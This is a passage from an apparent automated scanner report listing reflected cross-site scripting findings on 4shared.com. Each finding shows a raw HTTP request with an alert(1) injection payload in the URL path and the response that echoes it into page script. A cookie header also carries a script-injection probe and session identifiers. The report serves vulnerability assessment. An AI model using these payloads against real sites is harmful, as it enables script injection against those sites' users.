Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d8ddd&quot;-alert(1)-&quot;4eb60d1a81f/BAQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FB68892A373E29C54E58DFCA3C6C717.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.54. http://www.4shared.com/q/BAQD/1/photo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1ba"-alert(1)-"41986b68520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /cd1ba&quot;-alert(1)-&quot;41986b68520/BAQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=67639F9FC77CA94F11137417A85EE2B9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:46 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cd1ba"-alert(1)-"41986b68520/BAQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.55. http://www.4shared.com/q/BAQD/1/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858cf"-alert(1)-"bdd77823b47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /858cf"-alert(1)-"bdd77823b47/BAQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /858cf&quot;-alert(1)-&quot;bdd77823b47/BAQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3C640796F120D13D434DE54103841592.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/858cf"-alert(1)-"bdd77823b47/BAQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.56. http://www.4shared.com/q/BBQD/1/books_office [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd152"-alert(1)-"2424e2b2550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /fd152&quot;-alert(1)-&quot;2424e2b2550/BBQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC530E46FC3B2E00AA7E9B1A9CBE82FE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:01 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.57. http://www.4shared.com/q/BBQD/1/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d14"-alert(1)-"821bdd307fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /d0d14&quot;-alert(1)-&quot;821bdd307fa/BBQD/1/music
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BBA5D99DE20ED5B76ABAEA41857ABC88.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/d0d14"-alert(1)-"821bdd307fa/BBQD/1/music";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.58. http://www.4shared.com/q/BBQD/1/photo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/photo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6737"-alert(1)-"b10306e2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c6737"-alert(1)-"b10306e2af/BBQD/1/photo HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /c6737&quot;-alert(1)-&quot;b10306e2af/BBQD/1/photo
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=46767249EFBF094A5A5310B7A919D858.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:58 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/c6737"-alert(1)-"b10306e2af/BBQD/1/photo";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.59. http://www.4shared.com/q/BBQD/1/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BBQD/1/video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82467"-alert(1)-"f15a819900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /82467"-alert(1)-"f15a819900/BBQD/1/video HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /82467&quot;-alert(1)-&quot;f15a819900/BBQD/1/video
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E3054CC4BE274D5119832B17CA3C7098.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/82467"-alert(1)-"f15a819900/BBQD/1/video";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.60. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea29"-alert(1)-"e20dd6bf12d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail